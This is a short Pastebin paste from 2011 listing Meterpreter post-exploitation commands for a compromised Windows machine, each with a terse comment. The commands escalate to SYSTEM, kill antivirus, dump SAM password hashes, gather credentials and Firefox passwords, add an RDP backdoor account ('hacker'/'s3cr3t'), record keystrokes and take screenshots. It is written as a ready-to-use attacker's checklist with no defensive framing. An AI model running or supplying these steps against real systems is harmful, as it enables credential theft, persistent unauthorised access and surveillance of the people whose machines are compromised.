Advertisement
infodox

meterpreter_post

Dec 29th, 2011
196
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.14 KB | None | 0 0
  1. #post exploitation commands Meterpreter...
  2.  
  3. use priv # Loads the "priv" extension
  4. getsystem # GETS system on owned box
  5. run post/windows/manage/migrate # Migrates process
  6. use espia # Loads espia extension
  7. run killav # Kills AV
  8. run winenum # Gets system data
  9. run scraper # Gets more system data
  10. run checkvm # Checks did we own someones vm
  11. run getcountermeasure # gets firewall info
  12. run post/windows/gather/hashdump # Dumps SAM
  13. run post/windows/gather/credential_collector # gets creds
  14. run getgui -u hacker -p s3cr3t # Enables RDP with user hacker and pass s3cr3t
  15. screengrab # takes screenshot of target :)
  16. run get_local_subnets
  17. run post/windows/gather/dumplinks
  18. run post/windows/capture/keylog_recorder
  19. run post/windows/gather/enum_shares
  20. run post/multi/gather/firefox_creds
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement